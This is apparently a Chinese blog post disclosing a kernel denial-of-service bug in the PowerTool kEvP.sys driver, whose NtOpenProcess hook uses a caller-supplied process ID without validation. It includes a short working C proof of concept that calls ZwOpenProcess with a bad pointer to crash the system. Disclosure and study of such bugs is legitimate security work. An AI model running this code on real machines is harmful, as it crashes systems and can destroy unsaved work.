百度百科:

PowerTool 一款免费强大的进程管理器,支持进程强制结束,可以Unlock占用文件的进程,查看文件/文件夹被占用的情况,内核模块和驱动的查看和管理,进程模块的内存的dump等功能。最新版还支持上传文件在线扫描病毒。支持离线的启动项和服务的检测和删除,新增注册表和服务的强删功能,可在PE系统下清除感染MBR的病毒(如鬼影等),通过Windows7 SP1的测试。

--------------------------------------------------------------------------------------------------------------

其在加载的时候,为了让不让恶意软件结束自身,而SSDT Hook了NtOpenProcess函数。但是未对Ring3传过来的参数做任何校验就直接使用了,因此,触发漏洞。

示例函数:FakeNtOpenProcess

偏移:ED70

IDA汇编代码如下:

正如上面的汇编代码所示,只要CID参数不为空,他就直接调用了PsLookupProcessByProcessId函数。

而PsLookupProcessByProcessId是内核函数,其自身不会对参数有任何校验:

测试代码:

/*作者:莫灰灰博客:http://blog.csdn.net/hu3167343描述:PowerTool内核拒绝服务漏洞测试程序
*/#include "stdafx.h"
#include <windows.h>int _tmain(int argc, _TCHAR* argv[])
{HMODULE hMod = LoadLibrary(L"ntdll.dll");if (hMod){PVOID p = GetProcAddress(hMod, "ZwOpenProcess");if (p){printf("Your System Will Crash, See you nala.\n");__asm{push 0x80000000push 0push 0push 0call p}}}system("pause");return 0;
}

Ps:在开启PowerTool自保护的情况下运行上面程序,系统会蓝屏重启。正常机器木有问题。

PowerTool kEvP.sys=V4.2 内核拒绝服务漏洞相关推荐

  1. 2345内核拒绝服务漏洞(1)

    概述 已经快2个月了吧,已经忘了是什么原因突然搞起了驱动漏洞,反正就是很有兴致地想挖掘一下驱动漏洞. 在网上了解了基本的驱动漏洞挖掘方法,主要是通过ioctl接口进行挖掘,已经有很多相关fuzz工具了 ...

  2. 瑞星2011、2012神马的各种内核拒绝服务漏洞

    看了看雪上的这篇帖子<瑞星全功能安全软件2011内核拒绝服务漏洞>http://bbs.pediy.com/showthread.php?t=151241.里面提到的驱动签名时间签名是20 ...

  3. 2345内核拒绝服务漏洞(3)- WORD的锅

    漏洞概述 软件网址:http://safe.2345.cc/ 版本:v3.7 X64 2345安全软件的驱动2345BdPcSafe.sys在ioctl(0x0022204C)接口处理中,对输入数据校 ...

  4. linux内核系列远程拒绝服务漏洞,预警 | Linux 爆“SACK Panic”远程DoS漏洞,大量主机受影响...

    近日,腾讯云安全中心监测到Linux 内核被曝存在TCP "SACK Panic" 远程拒绝服务漏洞(漏洞编号:CVE-2019-11477,CVE-2019-11478,CVE- ...

  5. 瑞星 HookCont.sys <= 24.0.0.5 驱动本地拒绝服务漏洞

    漏洞详情 披露状态: 2010-07-27: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-04: 细节向第三方安全合作伙伴开放 1970- ...

  6. CVE-2015-3636(pingpong root) android内核 UAF漏洞分析

    前言 去年差不多这个时候就计划把这个漏洞给分析了,由于android没有经常搞,所以踩了很多坑,中间一度因为各种原因停滞放弃,最近遇到一个事情让我下定决心把它了结,也算是解决一个心病.过程会写详细一点 ...

  7. Linux Kernel ‘_xfs_buf_find()’函数空指针引用拒绝服务漏洞

    漏洞名称: Linux Kernel '_xfs_buf_find()'函数空指针引用拒绝服务漏洞 CNNVD编号: CNNVD-201303-071 发布时间: 2013-03-06 更新时间: 2 ...

  8. 一个内核网络漏洞详解|容器逃逸

    CVE-2021-22555:一个影响2006年(Linux kernel v2.6.19-rc1 发布)至今(Linux kernel v5.12-rc8)的所有Linux内核版本的漏洞,可导致本地 ...

  9. Linux kernel 本地拒绝服务漏洞

    漏洞名称: Linux kernel 本地拒绝服务漏洞 CNNVD编号: CNNVD-201302-387 发布时间: 2013-02-22 更新时间: 2013-02-22 危害等级:   漏洞类型 ...

最新文章

  1. Session——servlet
  2. 如何安装php网站,如何安装部署PHP网站
  3. 《机器学习》 周志华学习笔记第五章 神经网络(课后习题) python实现
  4. SAP Spartacus B2B User list页面的数据加载逻辑
  5. jaxb 解析list元素_JAXB和根元素
  6. mysql镜像压缩包使用_如何连接docker的mysql镜像
  7. Elasticsearch--linux网络设置 开启密码访问---全文检索引擎ElasticSearch工作笔记021
  8. Redhat Enterprise Linux 6 正式版已经发布!
  9. 分析 tuning-primer.sh 源码
  10. SSH KEY免密码验证
  11. windows下C++内存碎片的测试
  12. matlab imrotated,图像旋转由Matlab无需使用imrotate
  13. 美国电话卡原生卡和虚商卡区别
  14. 【知识图谱】OpenKG 发布多个新冠病毒相关开放知识图谱
  15. VMware 虚拟机安装黑屏问题
  16. 高通SDM845平台Sensor学习——3.SLPI(Physical Sensor)
  17. 送给你的一份英语学习资料,请查收!
  18. android canvas 工作流_Activiti工作流引擎使用
  19. 如何用计算机测试交易系统,一种自动售票机交易功能的测试系统和方法与流程...
  20. 关于kafka数据丢失场景的一次激烈讨论.... |文末送书

热门文章

  1. 8 - 1 - Non-linear Hypotheses (10 min)
  2. php实现支付宝二维码支付
  3. python爬取b站弹幕分析_B站弹幕爬取原理解析(python)
  4. Mybatis系列2:模板模式在Mybatis中的执行器中的应用
  5. qt5应用程序打包发布和qt5的mysql驱动编译
  6. 最新100个微信小程序
  7. 旅游类App原型制作分享-Triposo
  8. Matlab:串联示例
  9. 清除Chrome浏览器下默认浅黄色背景(保存密码时出现)
  10. Python—docx 批量生成 docx 文件